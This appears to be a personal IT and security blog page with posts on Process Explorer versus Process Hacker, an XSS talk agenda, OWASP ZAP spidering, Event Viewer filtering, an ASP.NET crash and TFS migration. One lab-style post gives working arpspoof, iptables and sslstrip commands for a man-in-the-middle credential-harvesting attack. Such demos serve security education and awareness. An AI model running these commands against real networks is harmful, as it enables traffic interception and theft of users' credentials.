Computers, Programming, Technology, Music, Literature

Process Explorer vs Process Hacker–Part 1 of 2

leave a comment »

Originally posted on chentiangemalc:

Process Explorer the tool we’ve all come to love as “Task Manager on Steroids” has been for many IT pros one of the essential tools in their troubleshooting toolkit. Process Explorer was originally released in 1998 under the name NTHandlEx. Here is a screenshot of version 1.22. Notice the lack of processes in Windows NT 4.0!


By version 2.01 it had been renamed to HandleEx added some more process properties and kill feature.


It wasn’t until 16 June 2001 when Version 5.0 came out that it got renamed to Process Explorer. ( I was hoping to have a screenshot of this version as well but couldn’t find it anywhere…) In any case as of May 2011 with version 14.12 the tool has come a long way to be one of the most advanced “task manager” tools available:


However an open source project has been working on a competing product since…

View original 1,637 more words

Written by gmaran23

September 28, 2014 at 1:27 pm

Posted in Uncategorized

Process Explorer vs Process Hacker–Part 2 of 2

leave a comment »

Originally posted on chentiangemalc:

Continuing from Part 1 here we will now compare more advanced features of Process Explorer & Process Hacker.

Run As Options

Both Process Explorer and Process Hacker have “Run” options. Process Explorer has “Run” and “Run As Limited User”.While Process Hacker has “Run”, “Run As Limited User”, and “Run As”

In both programs “Run As Limited User” will launch the process with “Low” integrity security level on Vista and higher.

However Process Hacker’s Run As is the most powerful with many special options…


User name can be any standard user name but also can include special accounts such as:


We can also select what “type”


Specific sessions can be targeted


as well as Desktops…


Finding Open Handles/DLLs

In Process Hacker this is found via Hacker | Find Handles or DLLs menu option, in Process Explorer it is via Find | Find Handle or DLL

The main difference here is…

View original 757 more words

Written by gmaran23

September 28, 2014 at 1:26 pm

Posted in Uncategorized

Devouring Security: Cross Site Scripting [XSS]

leave a comment »





Agenda in <ul><li>


·         Risk, Stories & the news

·         XSS Anatomy

·         Untrusted Data Sources – Well, Where did that come from?

·         Shouldn’t it be called CSS instead?

·         Types of XSS

-          Type 0 [DOM based]

-          Type 1 [Reflected or Non-persistent XSS]

-          Type 2 [Persistent or Stored XSS]

·         Live Demo: XSS 101 with alert(‘hello XSS world’)

·         Live Demo: Cookie Hijacking and Privilege Escalation

-          Face/Off with John Travolta and Nicolas Cage

·         Live Demo: Let’s deploy some Key loggers,huh?

·         Mitigations

-          Input Sanitization

-          Popular Libraries for .Net, Java, php

§  Demo: Input sanitization

-          Whitelists (vs. Blackists)

-          Output Encoding

§  Contextual

§  Demo: Output Encoding

-          Browser Protections & bypasses

-          Framework Protections & bypasses

-          Content Security Policy (CSP) in brief

·         Secure Code reviews: Spot an XSS, How?

·         Tools: Do we have an option?

·         XSS Buzz and how to Fuzz

·         Renowned Cheat sheets

·         Further reading & References


Does your Autolock Domain Workstation policy fail sometimes? But why?

leave a comment »


This article was originally published for and could be located at


The “Password Protect Screensaver” and the “Screen Saver Timeout” controlled by the group policy enables the screen saver to kick in at the specified interval of inactivity and on resume

displays the logon screen and so the workstation needs to be unlocked.


Then the normal procedure if you are doing it for the first time, you do a GPUDATE /FORCE. The policy would work like expected, however if some users/managers keep quibbling about their workstation not getting locked after the specified interval, check if any of the below exceptions apply.


  1. There is a video playing in YouTube or any website that uses flash based or html5 video player. This should be the active window.
  2. There is a video playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
  3. There is an audio playing in vlc, windows media player. Main window or the application need not have the focus, could be inactive (minimized, or hidden at the system tray).
  4. There is an automated test running. Desktop app automation or browser automation.
  5. A PowerPoint slideshow in progress.


The moment a computer is joined to a domain domain the policy would be effective and in case it did not work then it could be because of the above exceptions or the computer was not a part of the domain. The exceptions are asserted based on the fact that they let the operating system know that the computer is not idle. If you think this is not the expected behaviour, think how ecstatic you’d be when your screen get’s locked while you are enjoying a movie or you are in the middle of a presentation.

Written by gmaran23

September 26, 2014 at 2:08 pm

Devouring Security: OWASP ZAP – Successfully Ajax Spidering a website with Authentication

leave a comment »




OWASP ZAP – Successfully Ajax Spidering a website with Authentication (Northwind Products Management)

0. Make sure you are proxying via Zap (I love FoxyProxy)

1. Identify the session cookie

1.1 If the http session is not identified, use the Params tab and flag a Cookie as Session Token [alternatively, go to Tools --> Options.. --> Http Sessions and add a session identifier]

1.2 go do some browsing

2. Set an active session from the Http Sessions tab

3. Identify and exclude the Log off request from the spider (and scanner, and proxy, ir required)

Good luck with your Ajax spidering in ZAP!

Marudhamaran Gunasekaran


Also available on YouTube as an official OWASP ZAP video tutorial. Not so HD compared to vimeo. Thanks to Simon Bennets for feedback and sugesstions.




Written by gmaran23

August 29, 2014 at 4:42 pm

Posted in hacks, kali, linux, OWASP, security, Sqli

Devouring Security: Sslstrip and arpspoofing for credential harvesting

leave a comment »




You may think you are connecting to a website over ssl, but did you forget to check https at the address bar?



Victim - Windows 7 –

Attacker – Kali linux –


arpspoof gateway –



•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward


•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>


arpspoof -i eth0 -t


•Setup iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <listenPort>


iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000


•Run sslstrip. -l <listenPort>




Written by gmaran23

July 4, 2014 at 8:58 pm

Event Viewer – Filtering user events for forensics and audits

leave a comment »


This article was originally published for and could be located at Event Viewer – Filtering user events for forensics and audits


Skip the story

Let’s say you are tracking down some user, or trying to find users that logged in to a common Windows workstation at a timeline. Sounds downright easy with Event Viewer right? Create a custom view or filter the current view of the the Windows Logs\Security events, type in the user account in the User: textbox, and you should be done. But it does not work because it is not supposed to work by design.


Fig: 1

When the event viewer generates a query for the filter that we created to query a particular users activity, it actually associates the SID of that user to the actual query, and returns you 0 events.


Fig: 2

Why did it return 0 events? It is ok, that the user name that was typed in to the User: textbox got converted to the SID. But shouldn’t it have listed activities for that user? However, if you go the Windows Logs\Security (without any filters), you’d wonder that there are actually many events logged for the user name (Account Name: ) that you want to filter (ma is the user name in the sample).


Fig: 3

Picking a particular event, if you click Details to view the same event in xml or friendly view, ma (the user we want to query) is actually the TargetUserName w.r.t the event viewer database, and the TargetUserSid is the Sid associated to the user ma.


Fig: 4


Fig: 5

Let’s pause for a moment and think back, If the SID for the user is called as TargetUserSid in the Details view, shouldn’t the Query that Event Viewer generated in Fig 2 actually be TargetUserSid instead of UserID.


That is,


  <Query Id="0" Path="Security"> 
    <Select Path="Security">*[System[Security[@TargetUserSid='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select> 


instead of


  <Query Id="0" Path="Security"> 
    <Select Path="Security">*[System[Security[@UserID='S-1-5-21-458116588-1234567890-1874793278-1000']]]</Select> 


May be I am misunderstood, may be I do not understand the Event Viewer terminologies. I don’t know. All we expect is when we type the User: we want to filter the logs for, let the event viewer do it’s own queries and it’s conversions, I’d like to see the logs for that particular user. Since that does not work as expected, how do we actually see the Security logs for a user?


Use the below xml when you create the custom filter or when you try to filter the an existing log path. Remember it is the subjectUsername in the xml query.


  <Query Id="0" Path="Security"> 
    <Select Path="Security">* [EventData[Data[@Name='subjectUsername']='ma']]</Select> 


If there is an easy way, let me know.

Also, below is a table of logon events and logon types explained by their code. The list below is derived from a SANS poster named SANS-Digital-Forensics-and-Incident-Response-Poster-2012.pdf. I lost the hyperlink of that poster, but a more descriptive is list could be found at –


Logon Type




Logon via console


Network Logon


Batch Logon


Windows Service Logon


Credentials used to unlock screen


Network logon sending credentials (cleartext) 


Different credentials used than logged on user


Remote interactive logon (RDP)


Cached credentials used to logon


Event ID

XP / Win 7



528 / 4624

Successful Logon

529 / 4625

Failed Logon

538 / 4634

Successful Logoff 

540 / 4624

Successful Network Logon

Written by gmaran23

July 4, 2014 at 8:41 pm

Let your IIS worker process crash with StackOverflowException

with one comment


This article was originally published for and could be located at


Months back I posted a screenshot at, finally got time to write it down.


There was a Login page, that did some sort of authorization check beyond authenticating the user, and displayed an Access Denied page for those who weren’t lucky enough. This was all done by the ASP.NET MVC with ASPX view engine. So there’s things like Views, Partial Views, RenderPartial, and so on. The application also was heavily ajax enabled, so partial views really seemed to fit in at many places that did not want to include a master page content in the response text. There was a view file called AccessDenied.aspx that barked at unauthorized users. Things were working fine, and one day something broke, IIS was crashing without any meaningful error message. I lied, actually it did give a meaningful error message that was like – An unhandled exception of type ‘System.StackOverflowException’ occurred in mscorlib.dll. And the Call Stack showed some recursive function call. That is all there was to it.

Let’s look at a POC sample application below. Download the source from github –, Hit F5.




When you click the AccessDeniedForCrash page, the below is what you see. An unhandled exception of type ‘System.StackOverflowException’ occurred in mscorlib.dll. If you look at the Call Stack window, there would be a lot of repeated method calling method.




Let’s look at what happens when a view is requested, as in how the view engine probes the known locations to find the view definition. Click ViewDoesNotExist, and you would see an error page, that actually tells you the file locations that ASPX view engine probed to find a matching view. Pay attention to the search order where a .aspx file is searched first, and then the .ascx file.


Now, if you go back to the StackOverflowExceptionInASPXViewEngine solution, there are two files called AccessDeniedForCrash.ascx and AccessDeniedForCrash.aspx under ~/Views/Home.




The following code inside AccessDeniedForCrash.aspx calls the partial view AccessDeniedForCrash.ascx.


<asp:Content ID="Content3" ContentPlaceHolderID="FeaturedContent" runat="server">
            <section class="featured">
        <div class="content-wrapper">
            <hgroup class="title">
                <% Html.RenderPartial("AccessDeniedForCrash"); %>


A typical programming practice right? You define sub routines, and you keep calling them as and when required. Reusability! You have created a partial view here (AccessDeniedForCrash.ascx), and kept calling the partial view inside the main view (AccessDeniedForCrash.aspx). But it was the ASPX view engine’s probing method that caused the recursive method call. The view engine reached AccessDeniedForCrash.aspx, as it came through the HomeController’s action method AccessDeniedForCrash. It tried to find a partial view AccessDeniedForCrash.ascx,  but always ended up with AccessDeniedForCrash.aspx because of the file search order; you know the rest of the story about recursion without an exit condition.

So, is this a programming error? or the framework error? or the ‘programmer did not understand the framework well’ error?



You may also like –

Written by gmaran23

June 30, 2014 at 7:16 pm

Restoring TFS services after host name and domain binding changes

leave a comment »


This article was originally published for and could be located at


I have a local TFS server set up for testing CI integration of certain tools. The database storage (sql server 2012 express), the application tier, the build agent, the controller everything set up in localhost. I am working with TFS 2012, which TFS services running under <<computername>>\TfsUser.


The computer was recently migrated to another domain, which involved the computer name change, and obviously the domain name change itself. That’s it. TFS services started with 503 Service unavailable. The TFS application pool was stopped, and never started again. The TFS Administrator Console was always throwing all sorts of error messages. I was not prepared for any of these changes, it took me some time to fix all of them and get the CI functionality working flawlessly again. Ironically, all these happened after I happily blogged about Migrate user profiles to new domain account in a jiffy with Profwiz. But, here I am documenting my steps one by one. If your (local) TFS server installation has incurred a domain change, you may find these steps helpful. You may be at best when you follow the steps sequentially. All the steps involve changing the old machine name to the new machine name and fixing the Windows identities.


1. Verify/Update the Application Tier web.config

Navigate to the TFS Application Tier Web Services folder, and edit the applicationDatabase appSettings value. The Data Source should be be <<newcomputername>>\databaseServer.

C:\Program Files\Microsoft Team Foundation Server 11.0\Application Tier\Web Services\web.config



2. Verify/Update the TFS sql server database Logins

I use <<machinename>>\TfsUser as an admin console user. Connect to the sql server where Tfs configurations are saved, Remove the logins with the old machine names. (If the old machine name’s Login exists, then it will result in a SID conflict later during other stages). Add new logins with the new <<machinename>>. Let them have sysadmin permissions.

“TF255507: The security identifier (SID) for the following SQL Server login conflicts with a specified domain or workgroup account: <<oldcomputername>>\user. The domain or workgroup account is: <<newcomputername>>\user.  The server selected to host the databases for Team Foundation Server is: <<newcomputername>>\sql2012express.
You can resolve this issue by renaming the conflicting login.”



3. Verify/Update the Tfs Application Pool identities

Make sure the Tfs Application Pools Microsoft Team Foundation Server Application Pool, and Microsoft Team Foundation Server Message Queue Application Pool in IIS runs under the <<newcomputername>>\<<yourIdentify>>. In my case it is TfsUser.



4. iisreset at will. Couple of time during the entire troubleshooting process.


Try browsing to http://localhost:9000/tfs (or wherever your http://hostname:portnumber/tfs is),  you should be done here if you get the tfs Getting Started screen.

5. Dealing with Sync error for identity

However, If you encounter ‘The trust relationship between this workstation and the primary domain failed’, or the below errors, proceed.

TF53010: The following error has occurred in a Team Foundation component or extension:
Date (UTC): 15-05-2014 18:01:13
Machine: <<machinename>>
Application Domain: TfsJobAgent.exe
Assembly: Microsoft.TeamFoundation.Framework.Server, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a; v4.0.30319
Service Host: 
Process Details:
  Process Name: TFSJobAgent
  Process Id: 3020
  Thread Id: 4640
  Account name: <<machinename>>\TfsUser

Detailed Message: TF200035: One or more errors occurred when Team Foundation Server attempted to synchronize the following identity: Administrators. Number of errors that occurred: 1.
Sync error for identity: Administrators
The trust relationship between this workstation and the primary domain failed
   at Microsoft.TeamFoundation.Framework.Common.SidIdentityHelper.ResolveSid(SecurityIdentifierInfo securityIdInfo, String& domain, String& userName, AccountType& type, Boolean& isDeleted, Boolean& migrated)
   at Microsoft.VisualStudio.Services.Identity.WindowsProvider.ResolveIdentity(IdentityDescriptor descriptor, String providerInfo, AccountSubType& subType, Boolean& migrated)
   at Microsoft.VisualStudio.Services.Identity.WindowsProvider.TrySyncIdentity(IdentityDescriptor descriptor, Boolean includeMembership, String providerInfo, TeamFoundationRequestContext requestContext, SyncErrors syncErrors, Identity& identity)
   at Microsoft.VisualStudio.Services.Identity.IdentitySynchronizer.SyncOneGroupMembership(TeamFoundationRequestContext requestContext, Identity groupToSync)





Ask your System administrator to Reset the computer account in AD. That is right click on the computer and do Reset Account.


img src –


Then, Start –> Run –> sysdm.cpl , Hit the Network ID… button. Follow the steps to join the computer to a domain. This step would require a Domain Admins account, use your System Administrator’s or AD Administrator’s help, and complete the Join a Domain or Workgroup wizard.


Doing a Reset Account on AD computer account, and Joining it again to the domain via Network ID… made my ‘The trust relationship between this workstation and the primary domain failed’ error disappear.

6. Verify/Update Application Tier’s Notification URL, Server URL, Web Access URL


In Team Foundation Server Administration Console, Click Change URLs in Application Tier Summary, and update the Notification URL, Server URL to the <<newmachinename>>.



7. Unregister/Register the Build service with new machine name

Unregister the build service that uses the <<oldcomputername>>. Register a build service with the <<newcomputername>>. And do the same for the agent and the controller.




That’s should be it. At least the steps that I did to got my TFS installation working again. If you want to check the Check in, and build service, then follow the steps below.

8. Fixing the workspace conflict in Visual Studio TFS Client

Simple solution by Anand is to remove the current workspace the solution was bound to, so the VS TFS Client would automatically create one. I did not have any pending changes.

Open Developer Command Prompt for VS2012, run

C:\Program Files (x86)\Microsoft Visual Studio 11.0>tf workspaces


to see existing workspaces, and remove the workspaces bound to the <<oldcomputername>> with

C:\Program Files (x86)\Microsoft Visual Studio 11.0>tf workspaces /remove:<<oldcomputername>>


TFS client should connect fine now, and should have created a new workspace for you. Map the source control to the local directory.


Edit your build definition to update the Build Controller: to the newly created build controller.



Check in, and see your CI working again with all tests and other configured tools.




Get every new post delivered to your Inbox.